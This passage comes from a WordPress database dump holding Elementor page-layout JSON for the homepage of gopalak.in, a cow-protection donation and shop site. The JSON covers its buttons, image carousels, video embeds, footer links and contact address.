us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11820,1961,'_elementor_page_assets','a:0:{}'),(11822,1962,'_elementor_edit_mode','builder'),(11823,1962,'_elementor_template_type','wp-page'),(11824,1962,'_elementor_version','3.7.8'),(11825,1962,'_wp_page_template','elementor_canvas'),(11826,1962,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\